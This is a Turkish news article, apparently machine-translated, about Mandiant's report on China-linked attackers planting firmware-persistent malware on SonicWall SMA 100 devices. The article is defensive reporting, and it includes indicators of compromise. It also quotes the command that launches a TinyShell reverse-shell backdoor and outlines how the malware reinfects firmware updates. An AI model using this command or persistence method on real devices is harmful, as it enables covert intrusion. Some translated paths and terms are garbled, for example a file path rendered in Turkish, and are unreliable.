Araştırmacılar, Çin hükümetiyle bağlantısı olan tehdit aktörlerinin, SonicWall’ın yaygın olarak kullanılan bir güvenlik cihazına, cihaz üretici yazılımı güncellemelerini aldıktan sonra bile aktif kalan kötü amaçlı yazılım bulaştırdığını söyledi.
SonicWall’lar Güvenli Mobil Erişim 100 kuruluşların uzak iş gücünü güvenli bir şekilde dağıtmasına yardımcı olan güvenli bir uzaktan erişim aracıdır. Müşteriler, uzak kullanıcılara ayrıntılı erişim denetimleri vermek, kuruluş ağlarına VPN bağlantıları sağlamak ve her çalışan için benzersiz profiller ayarlamak için kullanır. SMA 100’ün müşteri ağlarına erişimi, onu tehdit aktörleri için çekici bir hedef haline getiriyor.
2021 yılında cihaz saldırıya uğradı o zamanlar sıfırıncı gün güvenlik açığı olan şeyi kullanan sofistike bilgisayar korsanları tarafından. Güvenlik cihazları Fortinet Ve Nabız Güvenli son yıllarda benzer saldırılara maruz kaldı.
Ağlar içinde uzun vadeli kalıcılık elde etme
Perşembe günü, güvenlik firması Mandiant bir rapor Çin ile şüpheli bir bağlantıya sahip olan tehdit aktörlerinin, yama uygulanmamış SonicWall SMA cihazlarında kötü amaçlı yazılım çalıştırarak uzun vadeli kalıcılığı sürdürmek için bir kampanya yürüttüklerini söyledi. Kampanya, kötü amaçlı yazılımın, ürün yazılımı yeni ürün yazılımı aldıktan sonra bile cihazlarda kalabilmesi açısından dikkate değerdi.
Mandiant araştırmacıları Daniel Lee, Stephen Eckels ve Ben Read, “Saldırganlar araçlarının kararlılığı ve kalıcılığı için önemli çaba sarf ediyor” diye yazdı. “Bu, ağa erişimlerinin ürün yazılımı güncellemeleri aracılığıyla devam etmesine ve SonicWall Cihazı aracılığıyla ağ üzerinde bir yer tutmasına izin veriyor.”
Bu kalıcılığı sağlamak için, kötü amaçlı yazılım her 10 saniyede bir mevcut üretici yazılımı yükseltmelerini kontrol eder. Bir güncelleme kullanıma sunulduğunda, kötü amaçlı yazılım arşivlenmiş dosyayı yedekleme için kopyalar, sıkıştırılmış dosyayı açar, bağlar ve ardından tüm kötü amaçlı dosya paketini ona kopyalar. Kötü amaçlı yazılım, bağlanan dosyaya bir arka kapı kök kullanıcısı da ekler. Ardından, kötü amaçlı yazılım, yüklemeye hazır olması için dosyayı yeniden sıkıştırır.
Araştırmacılar, “Teknik özellikle karmaşık değil, ancak saldırganın cihaz güncelleme döngüsünü anlamak, ardından kalıcılık için bir yöntem geliştirmek ve test etmek için büyük çaba sarf ettiğini gösteriyor” diye yazdı.
Kalıcılık teknikleri, 16 kötü amaçlı yazılım ailesini kullanan 2021’deki bir saldırı kampanyasıyla tutarlıdır. Pulse Secure cihazlarına bulaşma. Mandiant saldırıları, şirketin “Çin hükümetinin temel önceliklerini” desteklediğini söylediği UNC2630, UNC2717 olarak izlenenler de dahil olmak üzere çok sayıda tehdit grubuna bağladı. Mandiant, SonicWall SMA 100 müşterilerine yönelik devam eden saldırıları UNC4540 olarak izlenen bir gruba bağladı.
“Son yıllarda Çinli saldırganlar, tam kurumsal izinsiz girişe giden bir yol olarak İnternet’e bakan çeşitli ağ aygıtları için birden çok sıfır gün açıklarından yararlanma ve kötü amaçlı yazılım dağıttı ve burada bildirilen örnek, Mandiant’ın devam etmesini beklediği yakın tarihli bir modelin parçası. yakın dönem,” diye yazdı Mandiant araştırmacıları Perşembe günkü raporunda.
Yüksek ayrıcalıklı erişim
Kötü amaçlı yazılımın ana amacı, oturum açmış tüm kullanıcılar için kriptografik olarak hashlenmiş parolaları çalmak gibi görünüyor. Ayrıca, tehdit aktörünün yeni kötü amaçlı yazılım yüklemek için kullanabileceği bir web kabuğu sağlar.
Araştırmacılar Perşembe günkü raporda, “Güvenliği ihlal edilmiş bir cihazın analizi, saldırganın cihaza son derece ayrıcalıklı ve erişilebilir bir erişim sağlayan bir dosya koleksiyonunu ortaya çıkardı” diye yazdı. “Kötü amaçlı yazılım, bir dizi bash betiğinden ve TinyShell varyantı olarak tanımlanan tek bir ELF ikili dosyasından oluşuyor. Kötü amaçlı bash betikleri paketinin genel davranışı, aracın ayrıntılı bir şekilde anlaşıldığını gösterir ve kararlılık ve kalıcılık sağlamak için sisteme iyi uyarlanmıştır.”
Kötü amaçlı yazılımların listesi:
| Yol | Doğramak | İşlev |
| /bin/güvenlik duvarı | e4117b17e3d14fe64f45750be71dbaa6 | Ana kötü amaçlı yazılım süreci |
| /bin/httpsd | 2d57bcb8351cf2b57c4fd2d1bb8f862e | TinyShell arka kapısı |
| /etc/rc.d/rc.local | 559b9ae2a578e1258e80c45a5794c071 | Güvenlik duvarı için önyükleme kalıcılığı |
| /bin/iptabled | 8dbf1effa7bc94fc0b9b4ce83dfce2e6 | Yedekli ana kötü amaçlı yazılım süreci |
| /bin/geoBotnetd | 619769d3d40a3c28ec83832ca521f521 | Firmware arka kapı betiği |
| /bin/ifconfig6 | fa1bf2e427b2defffd573854c35d4919 | Zarif kapatma komut dosyası |
Rapor şöyle devam etti:
Ana kötü amaçlı yazılım giriş noktası, adlı bir bash betiğidir.
firewalldbirincil döngüsünü sistemdeki her dosyanın karesi için bir kez yürütür: …for j in $(ls / -R) do for i in $(ls / -R) do:… Betik, kimlik bilgilerinin çalınmasını ve diğer bileşenlerin çalıştırılmasını gerçekleştirmek için bir SQL komutunun yürütülmesinden sorumludur.içindeki ilk işlev
firewalldTinyShell arka kapısını yürütürhttpsdkomut ilenohup /bin/httpsd -c -d 5 -m -1 -p 51432 > /dev/null 2>&1 &Eğerhttpsdişlem zaten çalışmıyor. Bu, TinyShell’i ters kabuk moduna ayarlayarak, yukarıda bahsedilen IP adresine ve bağlantı noktasına, tarafından temsil edilen belirli bir saat ve günde çağrı yapması talimatını verir.-mtarafından tanımlanan bir işaret aralığı ile bayrak-dbayrak. İkili, IP adresi bağımsız değişkeni boş bırakılırsa ters kabuk modunda kullanılan, sabit kodlanmış bir IP adresini katıştırır. Ayrıca bir dinleme bağlama kabuğu modu da mevcuttur.
Araştırmacılar, ilk enfeksiyon vektörünün ne olduğunu bilmediklerini söylediler.
Geçen hafta, SonicWall bir danışma bu, SMA 100 kullanıcılarını 10.2.1.7 veya daha yüksek bir sürüme yükseltmeye teşvik etti. Bu sürümler, Dosya Bütünlüğü İzleme ve anormal işlem tanımlama gibi geliştirmeleri içerir. yama mevcut Burada. Kullanıcılar ayrıca, anormal girişler veya dahili trafik dahil olmak üzere güvenlik ihlali belirtileri için günlükleri düzenli olarak incelemelidir.